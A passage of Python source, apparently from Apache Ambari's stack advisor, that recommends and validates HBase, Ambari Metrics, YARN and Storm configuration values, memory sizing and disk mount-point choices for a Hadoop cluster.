hbase_rs_heapsize)\n putHbaseEnvProperty(\"hbase_master_heapsize\", hbase_heapsize)\n putHbaseEnvProperty(\"hbase_master_xmn_size\", round_to_n(0.15*(hbase_heapsize+hbase_rs_heapsize),64))\n\n # If no local DN in distributed mode\n if operatingMode == \"distributed\":\n dn_hosts = self.getComponentHostNames(services, \"HDFS\", \"DATANODE\")\n # call by Kerberos wizard sends only the service being affected\n # so it is possible for dn_hosts to be None but not amsCollectorHosts\n if dn_hosts and len(dn_hosts) > 0:\n if set(amsCollectorHosts).intersection(dn_hosts):\n 
collector_cohosted_with_dn = \"true\"\n else:\n collector_cohosted_with_dn = \"false\"\n putAmsHbaseSiteProperty(\"dfs.client.read.shortcircuit\", collector_cohosted_with_dn)\n\n #split points\n scriptDir = os.path.dirname(os.path.abspath(__file__))\n metricsDir = os.path.join(scriptDir, '../../../../common-services/AMBARI_METRICS/0.1.0/package')\n serviceMetricsDir = os.path.join(metricsDir, 'files', 'service-metrics')\n sys.path.append(os.path.join(metricsDir, 'scripts'))\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n\n from split_points import FindSplitPointsForAMSRegions\n\n ams_hbase_site = None\n ams_hbase_env = None\n\n # Overriden properties form the UI\n if \"ams-hbase-site\" in services[\"configurations\"]:\n ams_hbase_site = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]\n if \"ams-hbase-env\" in services[\"configurations\"]:\n ams_hbase_env = services[\"configurations\"][\"ams-hbase-env\"][\"properties\"]\n\n # Recommendations\n if not ams_hbase_site:\n ams_hbase_site = configurations[\"ams-hbase-site\"][\"properties\"]\n if not ams_hbase_env:\n ams_hbase_env = configurations[\"ams-hbase-env\"][\"properties\"]\n\n split_point_finder = FindSplitPointsForAMSRegions(\n ams_hbase_site, ams_hbase_env, serviceMetricsDir, operatingMode, servicesList)\n\n result = split_point_finder.get_split_points()\n precision_splits = ' '\n aggregate_splits = ' '\n if result.precision:\n precision_splits = result.precision\n if result.aggregate:\n aggregate_splits = result.aggregate\n putAmsSiteProperty(\"timeline.metrics.host.aggregate.splitpoints\", ','.join(precision_splits))\n putAmsSiteProperty(\"timeline.metrics.cluster.aggregate.splitpoints\", ','.join(aggregate_splits))\n\n component_grafana_exists = False\n for service in services['services']:\n if 'components' in service:\n for component in service['components']:\n if 'StackServiceComponents' in component:\n # If Grafana is installed the hostnames would indicate its location\n if 'METRICS_GRAFANA' in component['StackServiceComponents']['component_name'] and\\\n len(component['StackServiceComponents']['hostnames']) != 0:\n component_grafana_exists = True\n break\n pass\n\n if not component_grafana_exists:\n putGrafanaPropertyAttribute(\"metrics_grafana_password\", \"visible\", \"false\")\n\n pass\n\n def getHostNamesWithComponent(self, serviceName, componentName, services):\n \"\"\"\n Returns the list of hostnames on which service component is installed\n \"\"\"\n if services is not None and serviceName in [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]:\n service = [serviceEntry for serviceEntry in services[\"services\"] if serviceEntry[\"StackServices\"][\"service_name\"] == serviceName][0]\n components = [componentEntry for componentEntry in service[\"components\"] if componentEntry[\"StackServiceComponents\"][\"component_name\"] == componentName]\n if (len(components) > 0 and len(components[0][\"StackServiceComponents\"][\"hostnames\"]) > 0):\n componentHostnames = components[0][\"StackServiceComponents\"][\"hostnames\"]\n return componentHostnames\n return []\n\n def getHostsWithComponent(self, serviceName, componentName, services, hosts):\n if services is not None and hosts is not None and serviceName in [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]:\n service = [serviceEntry for serviceEntry in services[\"services\"] if serviceEntry[\"StackServices\"][\"service_name\"] == 
serviceName][0]\n components = [componentEntry for componentEntry in service[\"components\"] if componentEntry[\"StackServiceComponents\"][\"component_name\"] == componentName]\n if (len(components) > 0 and len(components[0][\"StackServiceComponents\"][\"hostnames\"]) > 0):\n componentHostnames = components[0][\"StackServiceComponents\"][\"hostnames\"]\n componentHosts = [host for host in hosts[\"items\"] if host[\"Hosts\"][\"host_name\"] in componentHostnames]\n return componentHosts\n return []\n\n def getHostWithComponent(self, serviceName, componentName, services, hosts):\n componentHosts = self.getHostsWithComponent(serviceName, componentName, services, hosts)\n if (len(componentHosts) > 0):\n return componentHosts[0]\n return None\n\n def getHostComponentsByCategories(self, hostname, categories, services, hosts):\n components = []\n if services is not None and hosts is not None:\n for service in services[\"services\"]:\n components.extend([componentEntry for componentEntry in service[\"components\"]\n if componentEntry[\"StackServiceComponents\"][\"component_category\"] in categories\n and hostname in componentEntry[\"StackServiceComponents\"][\"hostnames\"]])\n return components\n\n def getZKHostPortString(self, services, include_port=True):\n \"\"\"\n Returns the comma delimited string of zookeeper server host with the configure port installed in a cluster\n Example: zk.host1.org:2181,zk.host2.org:2181,zk.host3.org:2181\n include_port boolean param -> If port is also needed.\n \"\"\"\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n include_zookeeper = \"ZOOKEEPER\" in servicesList\n zookeeper_host_port = ''\n\n if include_zookeeper:\n zookeeper_hosts = self.getHostNamesWithComponent(\"ZOOKEEPER\", \"ZOOKEEPER_SERVER\", services)\n zookeeper_host_port_arr = []\n\n if include_port:\n zookeeper_port = self.getZKPort(services)\n for i in range(len(zookeeper_hosts)):\n zookeeper_host_port_arr.append(zookeeper_hosts[i] + ':' + zookeeper_port)\n else:\n for i in range(len(zookeeper_hosts)):\n zookeeper_host_port_arr.append(zookeeper_hosts[i])\n\n zookeeper_host_port = \",\".join(zookeeper_host_port_arr)\n return zookeeper_host_port\n\n def getZKPort(self, services):\n zookeeper_port = '2181' #default port\n if 'zoo.cfg' in services['configurations'] and ('clientPort' in services['configurations']['zoo.cfg']['properties']):\n zookeeper_port = services['configurations']['zoo.cfg']['properties']['clientPort']\n return zookeeper_port\n\n def getConfigurationClusterSummary(self, servicesList, hosts, components, services):\n\n hBaseInstalled = False\n if 'HBASE' in servicesList:\n hBaseInstalled = True\n\n cluster = {\n \"cpu\": 0,\n \"disk\": 0,\n \"ram\": 0,\n \"hBaseInstalled\": hBaseInstalled,\n \"components\": components\n }\n\n if len(hosts[\"items\"]) > 0:\n nodeManagerHosts = self.getHostsWithComponent(\"YARN\", \"NODEMANAGER\", services, hosts)\n # NodeManager host with least memory is generally used in calculations as it will work in larger hosts.\n if nodeManagerHosts is not None and len(nodeManagerHosts) > 0:\n nodeManagerHost = nodeManagerHosts[0];\n for nmHost in nodeManagerHosts:\n if nmHost[\"Hosts\"][\"total_mem\"] < nodeManagerHost[\"Hosts\"][\"total_mem\"]:\n nodeManagerHost = nmHost\n host = nodeManagerHost[\"Hosts\"]\n cluster[\"referenceNodeManagerHost\"] = host\n else:\n host = hosts[\"items\"][0][\"Hosts\"]\n cluster[\"referenceHost\"] = host\n cluster[\"cpu\"] = host[\"cpu_count\"]\n cluster[\"disk\"] = 
len(host[\"disk_info\"])\n cluster[\"ram\"] = int(host[\"total_mem\"] / (1024 * 1024))\n\n ramRecommendations = [\n {\"os\":1, \"hbase\":1},\n {\"os\":2, \"hbase\":1},\n {\"os\":2, \"hbase\":2},\n {\"os\":4, \"hbase\":4},\n {\"os\":6, \"hbase\":8},\n {\"os\":8, \"hbase\":8},\n {\"os\":8, \"hbase\":8},\n {\"os\":12, \"hbase\":16},\n {\"os\":24, \"hbase\":24},\n {\"os\":32, \"hbase\":32},\n {\"os\":64, \"hbase\":32}\n ]\n index = {\n cluster[\"ram\"] <= 4: 0,\n 4 < cluster[\"ram\"] <= 8: 1,\n 8 < cluster[\"ram\"] <= 16: 2,\n 16 < cluster[\"ram\"] <= 24: 3,\n 24 < cluster[\"ram\"] <= 48: 4,\n 48 < cluster[\"ram\"] <= 64: 5,\n 64 < cluster[\"ram\"] <= 72: 6,\n 72 < cluster[\"ram\"] <= 96: 7,\n 96 < cluster[\"ram\"] <= 128: 8,\n 128 < cluster[\"ram\"] <= 256: 9,\n 256 < cluster[\"ram\"]: 10\n }[1]\n\n\n cluster[\"reservedRam\"] = ramRecommendations[index][\"os\"]\n cluster[\"hbaseRam\"] = ramRecommendations[index][\"hbase\"]\n\n\n cluster[\"minContainerSize\"] = {\n cluster[\"ram\"] <= 4: 256,\n 4 < cluster[\"ram\"] <= 8: 512,\n 8 < cluster[\"ram\"] <= 24: 1024,\n 24 < cluster[\"ram\"]: 2048\n }[1]\n\n totalAvailableRam = cluster[\"ram\"] - cluster[\"reservedRam\"]\n if cluster[\"hBaseInstalled\"]:\n totalAvailableRam -= cluster[\"hbaseRam\"]\n cluster[\"totalAvailableRam\"] = max(512, totalAvailableRam * 1024)\n '''containers = max(3, min (2*cores,min (1.8*DISKS,(Total available RAM) / MIN_CONTAINER_SIZE))))'''\n cluster[\"containers\"] = round(max(3,\n min(2 * cluster[\"cpu\"],\n min(ceil(1.8 * cluster[\"disk\"]),\n cluster[\"totalAvailableRam\"] / cluster[\"minContainerSize\"]))))\n\n '''ramPerContainers = max(2GB, RAM - reservedRam - hBaseRam) / containers'''\n cluster[\"ramPerContainer\"] = abs(cluster[\"totalAvailableRam\"] / cluster[\"containers\"])\n '''If greater than 1GB, value will be in multiples of 512.'''\n if cluster[\"ramPerContainer\"] > 1024:\n cluster[\"ramPerContainer\"] = int(cluster[\"ramPerContainer\"] / 512) * 512\n\n cluster[\"mapMemory\"] = int(cluster[\"ramPerContainer\"])\n cluster[\"reduceMemory\"] = cluster[\"ramPerContainer\"]\n cluster[\"amMemory\"] = max(cluster[\"mapMemory\"], cluster[\"reduceMemory\"])\n\n return cluster\n\n def getServiceConfigurationValidators(self):\n return {\n \"HDFS\": { \"hdfs-site\": self.validateHDFSConfigurations,\n \"hadoop-env\": self.validateHDFSConfigurationsEnv},\n \"MAPREDUCE2\": {\"mapred-site\": self.validateMapReduce2Configurations},\n \"YARN\": {\"yarn-site\": self.validateYARNConfigurations,\n \"yarn-env\": self.validateYARNEnvConfigurations},\n \"HBASE\": {\"hbase-env\": self.validateHbaseEnvConfigurations},\n \"STORM\": {\"storm-site\": self.validateStormConfigurations},\n \"AMBARI_METRICS\": {\"ams-hbase-site\": self.validateAmsHbaseSiteConfigurations,\n \"ams-hbase-env\": self.validateAmsHbaseEnvConfigurations,\n \"ams-site\": self.validateAmsSiteConfigurations}\n }\n\n def validateMinMax(self, items, recommendedDefaults, configurations):\n\n # required for casting to the proper numeric type before comparison\n def convertToNumber(number):\n try:\n return int(number)\n except ValueError:\n return float(number)\n\n for configName in configurations:\n validationItems = []\n if configName in recommendedDefaults and \"property_attributes\" in recommendedDefaults[configName]:\n for propertyName in recommendedDefaults[configName][\"property_attributes\"]:\n if propertyName in configurations[configName][\"properties\"]:\n if \"maximum\" in recommendedDefaults[configName][\"property_attributes\"][propertyName] and \\\n 
propertyName in recommendedDefaults[configName][\"properties\"]:\n userValue = convertToNumber(configurations[configName][\"properties\"][propertyName])\n maxValue = convertToNumber(recommendedDefaults[configName][\"property_attributes\"][propertyName][\"maximum\"])\n if userValue > maxValue:\n validationItems.extend([{\"config-name\": propertyName, \"item\": self.getWarnItem(\"Value is greater than the recommended maximum of {0} \".format(maxValue))}])\n if \"minimum\" in recommendedDefaults[configName][\"property_attributes\"][propertyName] and \\\n propertyName in recommendedDefaults[configName][\"properties\"]:\n userValue = convertToNumber(configurations[configName][\"properties\"][propertyName])\n minValue = convertToNumber(recommendedDefaults[configName][\"property_attributes\"][propertyName][\"minimum\"])\n if userValue < minValue:\n validationItems.extend([{\"config-name\": propertyName, \"item\": self.getWarnItem(\"Value is less than the recommended minimum of {0} \".format(minValue))}])\n items.extend(self.toConfigurationValidationProblems(validationItems, configName))\n pass\n\n def validateAmsSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = []\n\n op_mode = properties.get(\"timeline.metrics.service.operation.mode\")\n correct_op_mode_item = None\n if op_mode not in (\"embedded\", \"distributed\"):\n correct_op_mode_item = self.getErrorItem(\"Correct value should be set.\")\n pass\n\n validationItems.extend([{\"config-name\":'timeline.metrics.service.operation.mode', \"item\": correct_op_mode_item }])\n return self.toConfigurationValidationProblems(validationItems, \"ams-site\")\n\n def validateAmsHbaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n ams_site = getSiteProperties(configurations, \"ams-site\")\n core_site = getSiteProperties(configurations, \"core-site\")\n\n collector_heapsize, hbase_heapsize, total_sinks_count = self.getAmsMemoryRecommendation(services, hosts)\n recommendedDiskSpace = 10485760\n # TODO validate configuration for multiple AMBARI_METRICS collectors\n if len(amsCollectorHosts) > 1:\n pass\n else:\n if total_sinks_count > 2000:\n recommendedDiskSpace = 104857600 # * 1k == 100 Gb\n elif total_sinks_count > 500:\n recommendedDiskSpace = 52428800 # * 1k == 50 Gb\n elif total_sinks_count > 250:\n recommendedDiskSpace = 20971520 # * 1k == 20 Gb\n\n validationItems = []\n\n rootdir_item = None\n op_mode = ams_site.get(\"timeline.metrics.service.operation.mode\")\n default_fs = core_site.get(\"fs.defaultFS\") if core_site else \"file:///\"\n hbase_rootdir = properties.get(\"hbase.rootdir\")\n hbase_tmpdir = properties.get(\"hbase.tmp.dir\")\n distributed = properties.get(\"hbase.cluster.distributed\")\n is_local_root_dir = hbase_rootdir.startswith(\"file://\") or (default_fs.startswith(\"file://\") and hbase_rootdir.startswith(\"/\"))\n\n if op_mode == \"distributed\" and is_local_root_dir:\n rootdir_item = self.getWarnItem(\"In distributed mode hbase.rootdir should point to HDFS.\")\n elif op_mode == \"embedded\":\n if distributed.lower() == \"false\" and hbase_rootdir.startswith('/') or hbase_rootdir.startswith(\"hdfs://\"):\n rootdir_item = self.getWarnItem(\"In embedded mode hbase.rootdir cannot point to schemaless values or HDFS, \"\n \"Example - file:// for localFS\")\n pass\n\n distributed_item = None\n if op_mode == \"distributed\" and not 
distributed.lower() == \"true\":\n distributed_item = self.getErrorItem(\"hbase.cluster.distributed property should be set to true for \"\n \"distributed mode\")\n if op_mode == \"embedded\" and distributed.lower() == \"true\":\n distributed_item = self.getErrorItem(\"hbase.cluster.distributed property should be set to false for embedded mode\")\n\n hbase_zk_client_port = properties.get(\"hbase.zookeeper.property.clientPort\")\n zkPort = self.getZKPort(services)\n hbase_zk_client_port_item = None\n if distributed.lower() == \"true\" and op_mode == \"distributed\" and \\\n hbase_zk_client_port != zkPort and hbase_zk_client_port != \"{{zookeeper_clientPort}}\":\n hbase_zk_client_port_item = self.getErrorItem(\"In AMS distributed mode, hbase.zookeeper.property.clientPort \"\n \"should be the cluster zookeeper server port : {0}\".format(zkPort))\n\n if distributed.lower() == \"false\" and op_mode == \"embedded\" and \\\n hbase_zk_client_port == zkPort and hbase_zk_client_port != \"{{zookeeper_clientPort}}\":\n hbase_zk_client_port_item = self.getErrorItem(\"In AMS embedded mode, hbase.zookeeper.property.clientPort \"\n \"should be a different port than cluster zookeeper port.\"\n \"(default:61181)\")\n\n validationItems.extend([{\"config-name\":'hbase.rootdir', \"item\": rootdir_item },\n {\"config-name\":'hbase.cluster.distributed', \"item\": distributed_item },\n {\"config-name\":'hbase.zookeeper.property.clientPort', \"item\": hbase_zk_client_port_item }])\n\n for collectorHostName in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n if op_mode == 'embedded' or is_local_root_dir:\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": self.validatorEnoughDiskSpace(properties, 'hbase.rootdir', host[\"Hosts\"], recommendedDiskSpace)}])\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": self.validatorNotRootFs(properties, recommendedDefaults, 'hbase.rootdir', host[\"Hosts\"])}])\n validationItems.extend([{\"config-name\": 'hbase.tmp.dir', \"item\": self.validatorNotRootFs(properties, recommendedDefaults, 'hbase.tmp.dir', host[\"Hosts\"])}])\n\n dn_hosts = self.getComponentHostNames(services, \"HDFS\", \"DATANODE\")\n if is_local_root_dir:\n mountPoints = []\n for mountPoint in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(mountPoint[\"mountpoint\"])\n hbase_rootdir_mountpoint = getMountPointForDir(hbase_rootdir, mountPoints)\n hbase_tmpdir_mountpoint = getMountPointForDir(hbase_tmpdir, mountPoints)\n preferred_mountpoints = self.getPreferredMountPoints(host['Hosts'])\n # hbase.rootdir and hbase.tmp.dir shouldn't point to the same partition\n # if multiple preferred_mountpoints exist\n if hbase_rootdir_mountpoint == hbase_tmpdir_mountpoint and \\\n len(preferred_mountpoints) > 1:\n item = self.getWarnItem(\"Consider not using {0} partition for storing metrics temporary data. 
\"\n \"{0} partition is already used as hbase.rootdir to store metrics data\".format(hbase_tmpdir_mountpoint))\n validationItems.extend([{\"config-name\":'hbase.tmp.dir', \"item\": item}])\n\n # if METRICS_COLLECTOR is co-hosted with DATANODE\n # cross-check dfs.datanode.data.dir and hbase.rootdir\n # they shouldn't share same disk partition IO\n hdfs_site = getSiteProperties(configurations, \"hdfs-site\")\n dfs_datadirs = hdfs_site.get(\"dfs.datanode.data.dir\").split(\",\") if hdfs_site and \"dfs.datanode.data.dir\" in hdfs_site else []\n if dn_hosts and collectorHostName in dn_hosts and ams_site and \\\n dfs_datadirs and len(preferred_mountpoints) > len(dfs_datadirs):\n for dfs_datadir in dfs_datadirs:\n dfs_datadir_mountpoint = getMountPointForDir(dfs_datadir, mountPoints)\n if dfs_datadir_mountpoint == hbase_rootdir_mountpoint:\n item = self.getWarnItem(\"Consider not using {0} partition for storing metrics data. \"\n \"{0} is already used by datanode to store HDFS data\".format(hbase_rootdir_mountpoint))\n validationItems.extend([{\"config-name\": 'hbase.rootdir', \"item\": item}])\n break\n # If no local DN in distributed mode\n elif collectorHostName not in dn_hosts and distributed.lower() == \"true\":\n item = self.getWarnItem(\"It's recommended to install Datanode component on {0} \"\n \"to speed up IO operations between HDFS and Metrics \"\n \"Collector in distributed mode \".format(collectorHostName))\n validationItems.extend([{\"config-name\": \"hbase.cluster.distributed\", \"item\": item}])\n # Short circuit read should be enabled in distibuted mode\n # if local DN installed\n else:\n validationItems.extend([{\"config-name\": \"dfs.client.read.shortcircuit\", \"item\": self.validatorEqualsToRecommendedItem(properties, recommendedDefaults, \"dfs.client.read.shortcircuit\")}])\n\n return self.toConfigurationValidationProblems(validationItems, \"ams-hbase-site\")\n\n def validateStormConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n validationItems = []\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n # Storm AMS integration\n if 'AMBARI_METRICS' in servicesList and \"metrics.reporter.register\" in properties and \\\n \"org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter\" not in properties.get(\"metrics.reporter.register\"):\n\n validationItems.append({\"config-name\": 'metrics.reporter.register',\n \"item\": self.getWarnItem(\n \"Should be set to org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter to report the metrics to Ambari Metrics service.\")})\n\n return self.toConfigurationValidationProblems(validationItems, \"storm-site\")\n\n def validateAmsHbaseEnvConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):\n\n ams_env = getSiteProperties(configurations, \"ams-env\")\n amsHbaseSite = getSiteProperties(configurations, \"ams-hbase-site\")\n validationItems = []\n mb = 1024 * 1024\n gb = 1024 * mb\n\n regionServerItem = self.validatorLessThenDefaultValue(properties, recommendedDefaults, \"hbase_regionserver_heapsize\") ## FIXME if new service added\n if regionServerItem:\n validationItems.extend([{\"config-name\": \"hbase_regionserver_heapsize\", \"item\": regionServerItem}])\n\n hbaseMasterHeapsizeItem = self.validatorLessThenDefaultValue(properties, recommendedDefaults, \"hbase_master_heapsize\")\n if hbaseMasterHeapsizeItem:\n validationItems.extend([{\"config-name\": \"hbase_master_heapsize\", \"item\": 
hbaseMasterHeapsizeItem}])\n\n logDirItem = self.validatorEqualsPropertyItem(properties, \"hbase_log_dir\", ams_env, \"metrics_collector_log_dir\")\n if logDirItem:\n validationItems.extend([{\"config-name\": \"hbase_log_dir\", \"item\": logDirItem}])\n\n collector_heapsize = to_number(ams_env.get(\"metrics_collector_heapsize\"))\n hbase_master_heapsize = to_number(properties[\"hbase_master_heapsize\"])\n hbase_master_xmn_size = to_number(properties[\"hbase_master_xmn_size\"])\n hbase_regionserver_heapsize = to_number(properties[\"hbase_regionserver_heapsize\"])\n hbase_regionserver_xmn_size = to_number(properties[\"regionserver_xmn_size\"])\n\n # Validate Xmn settings.\n masterXmnItem = None\n regionServerXmnItem = None\n is_hbase_distributed = amsHbaseSite.get(\"hbase.cluster.distributed\").lower() == 'true'\n\n if is_hbase_distributed:\n minMasterXmn = 0.12 * hbase_master_heapsize\n maxMasterXmn = 0.2 * hbase_master_heapsize\n if hbase_master_xmn_size < minMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_master_heapsize)\".format(int(ceil(minMasterXmn))))\n\n if hbase_master_xmn_size > maxMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_master_heapsize)\".format(int(floor(maxMasterXmn))))\n\n minRegionServerXmn = 0.12 * hbase_regionserver_heapsize\n maxRegionServerXmn = 0.2 * hbase_regionserver_heapsize\n if hbase_regionserver_xmn_size < minRegionServerXmn:\n regionServerXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_regionserver_heapsize)\"\n .format(int(ceil(minRegionServerXmn))))\n\n if hbase_regionserver_xmn_size > maxRegionServerXmn:\n regionServerXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_regionserver_heapsize)\"\n .format(int(floor(maxRegionServerXmn))))\n else:\n minMasterXmn = 0.12 * (hbase_master_heapsize + hbase_regionserver_heapsize)\n maxMasterXmn = 0.2 * (hbase_master_heapsize + hbase_regionserver_heapsize)\n if hbase_master_xmn_size < minMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is lesser than the recommended minimum Xmn size of {0} \"\n \"(12% of hbase_master_heapsize + hbase_regionserver_heapsize)\"\n .format(int(ceil(minMasterXmn))))\n\n if hbase_master_xmn_size > maxMasterXmn:\n masterXmnItem = self.getWarnItem(\"Value is greater than the recommended maximum Xmn size of {0} \"\n \"(20% of hbase_master_heapsize + hbase_regionserver_heapsize)\"\n .format(int(floor(maxMasterXmn))))\n if masterXmnItem:\n validationItems.extend([{\"config-name\": \"hbase_master_xmn_size\", \"item\": masterXmnItem}])\n\n if regionServerXmnItem:\n validationItems.extend([{\"config-name\": \"regionserver_xmn_size\", \"item\": regionServerXmnItem}])\n\n if hbaseMasterHeapsizeItem is None:\n hostMasterComponents = {}\n\n for service in services[\"services\"]:\n for component in service[\"components\"]:\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n for hostName in component[\"StackServiceComponents\"][\"hostnames\"]:\n if self.isMasterComponent(component):\n if hostName not in hostMasterComponents.keys():\n hostMasterComponents[hostName] = []\n hostMasterComponents[hostName].append(component[\"StackServiceComponents\"][\"component_name\"])\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n for collectorHostName 
in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n # AMS Collector co-hosted with other master components in bigger clusters\n if len(hosts['items']) > 31 and \\\n len(hostMasterComponents[collectorHostName]) > 2 and \\\n host[\"Hosts\"][\"total_mem\"] < 32*mb: # < 32Gb(total_mem in k)\n masterHostMessage = \"Host {0} is used by multiple master components ({1}). \" \\\n \"It is recommended to use a separate host for the \" \\\n \"Ambari Metrics Collector component and ensure \" \\\n \"the host has sufficient memory available.\"\n\n hbaseMasterHeapsizeItem = self.getWarnItem(masterHostMessage.format(\n collectorHostName, str(\", \".join(hostMasterComponents[collectorHostName]))))\n if hbaseMasterHeapsizeItem:\n validationItems.extend([{\"config-name\": \"hbase_master_heapsize\", \"item\": hbaseMasterHeapsizeItem}])\n\n # Check for unused RAM on AMS Collector node\n hostComponents = []\n for service in services[\"services\"]:\n for component in service[\"components\"]:\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n if collectorHostName in component[\"StackServiceComponents\"][\"hostnames\"]:\n hostComponents.append(component[\"StackServiceComponents\"][\"component_name\"])\n\n requiredMemory = getMemorySizeRequired(hostComponents, configurations)\n unusedMemory = host[\"Hosts\"][\"total_mem\"] * 1024 - requiredMemory # in bytes\n if unusedMemory > 4*gb: # warn user, if more than 4GB RAM is unused\n heapPropertyToIncrease = \"hbase_regionserver_heapsize\" if is_hbase_distributed else \"hbase_master_heapsize\"\n xmnPropertyToIncrease = \"regionserver_xmn_size\" if is_hbase_distributed else \"hbase_master_xmn_size\"\n recommended_collector_heapsize = int((unusedMemory - 4*gb)/5) + collector_heapsize*mb\n recommended_hbase_heapsize = int((unusedMemory - 4*gb)*4/5) + to_number(properties.get(heapPropertyToIncrease))*mb\n recommended_hbase_heapsize = min(32*gb, recommended_hbase_heapsize) #Make sure heapsize <= 32GB\n recommended_xmn_size = round_to_n(0.12*recommended_hbase_heapsize/mb,128)\n\n if collector_heapsize < recommended_collector_heapsize or \\\n to_number(properties[heapPropertyToIncrease]) < recommended_hbase_heapsize:\n collectorHeapsizeItem = self.getWarnItem(\"{0} MB RAM is unused on the host {1} based on components \" \\\n \"assigned. 
Consider allocating {2} MB to \" \\\n \"metrics_collector_heapsize in ams-env, \" \\\n \"{3} MB to {4} in ams-hbase-env\"\n .format(unusedMemory/mb, collectorHostName,\n recommended_collector_heapsize/mb,\n recommended_hbase_heapsize/mb,\n heapPropertyToIncrease))\n validationItems.extend([{\"config-name\": heapPropertyToIncrease, \"item\": collectorHeapsizeItem}])\n\n if to_number(properties[xmnPropertyToIncrease]) < recommended_hbase_heapsize:\n xmnPropertyToIncreaseItem = self.getWarnItem(\"Consider allocating {0} MB to use up some unused memory \"\n \"on host\".format(recommended_xmn_size))\n validationItems.extend([{\"config-name\": xmnPropertyToIncrease, \"item\": xmnPropertyToIncreaseItem}])\n pass\n\n return self.toConfigurationValidationProblems(validationItems, \"ams-hbase-env\")\n\n\n def getPreferredMountPoints(self, hostInfo):\n\n # '/etc/resolv.conf', '/etc/hostname', '/etc/hosts' are docker specific mount points\n undesirableMountPoints = [\"/\", \"/home\", \"/etc/resolv.conf\", \"/etc/hosts\",\n \"/etc/hostname\", \"/tmp\"]\n undesirableFsTypes = [\"devtmpfs\", \"tmpfs\", \"vboxsf\", \"CDFS\"]\n mountPoints = []\n if hostInfo and \"disk_info\" in hostInfo:\n mountPointsDict = {}\n for mountpoint in hostInfo[\"disk_info\"]:\n if not (mountpoint[\"mountpoint\"] in undesirableMountPoints or\n mountpoint[\"mountpoint\"].startswith((\"/boot\", \"/mnt\")) or\n mountpoint[\"type\"] in undesirableFsTypes or\n mountpoint[\"available\"] == str(0)):\n mountPointsDict[mountpoint[\"mountpoint\"]] = to_number(mountpoint[\"available\"])\n if mountPointsDict:\n mountPoints = sorted(mountPointsDict, key=mountPointsDict.get, reverse=True)\n mountPoints.append(\"/\")\n return mountPoints\n\n def validatorNotRootFs(self, properties, recommendedDefaults, propertyName, hostInfo):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dir = properties[propertyName]\n if not dir.startswith(\"file://\") or dir == recommendedDefaults.get(propertyName):\n return None\n\n dir = re.sub(\"^file://\", \"\", dir, count=1)\n mountPoints = []\n for mountPoint in hostInfo[\"disk_info\"]:\n mountPoints.append(mountPoint[\"mountpoint\"])\n mountPoint = getMountPointForDir(dir, mountPoints)\n\n if \"/\" == mountPoint and self.getPreferredMountPoints(hostInfo)[0] != mountPoint:\n return self.getWarnItem(\"It is not recommended to use root partition for {0}\".format(propertyName))\n\n return None\n\n def validatorEnoughDiskSpace(self, properties, propertyName, hostInfo, reqiuredDiskSpace):\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n dir = properties[propertyName]\n if not dir.startswith(\"file://\"):\n return None\n\n dir = re.sub(\"^file://\", \"\", dir, count=1)\n mountPoints = {}\n for mountPoint in hostInfo[\"disk_info\"]:\n mountPoints[mountPoint[\"mountpoint\"]] = to_number(mountPoint[\"available\"])\n mountPoint = getMountPointForDir(dir, mountPoints.keys())\n\n if not mountPoints:\n return self.getErrorItem(\"No disk info found on host %s\" % hostInfo[\"host_name\"])\n\n if mountPoints[mountPoint] < reqiuredDiskSpace:\n msg = \"Ambari Metrics disk space requirements not met. 
\\n\" \\\n \"Recommended disk space for partition {0} is {1}G\"\n return self.getWarnItem(msg.format(mountPoint, reqiuredDiskSpace/1048576)) # in Gb\n return None\n\n def validatorLessThenDefaultValue(self, properties, recommendedDefaults, propertyName):\n if propertyName not in recommendedDefaults:\n # If a property name exists in say hbase-env and hbase-site (which is allowed), then it will exist in the\n # \"properties\" dictionary, but not necessarily in the \"recommendedDefaults\" dictionary\". In this case, ignore it.\n return None\n\n if not propertyName in properties:\n return self.getErrorItem(\"Value should be set\")\n value = to_number(properties[propertyName])\n if value is None:\n return self.getErrorItem(\"Value should be integer\")\n defaultValue = to_number(recommendedDefaults[propertyName])\n if defaultValue is None:\n return None\n if value < defaultValue:\n return self.getWarnItem(\"Value is less than the recommended default of {0}\".format(defaultValue))\n return None\n\n def validatorEqualsPropertyItem(self, properties1, propertyName1,\n properties2, propertyName2,\n emptyAllowed=False):\n if not propertyName1 in properties1:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName1)\n if not propertyName2 in properties2:\n return self.getErrorItem(\"Value should be set for %s\" % propertyName2)\n value1 = properties1.get(propertyName1)\n if value1 is None and not emptyAllowed:\n return self.getErrorItem(\"Empty 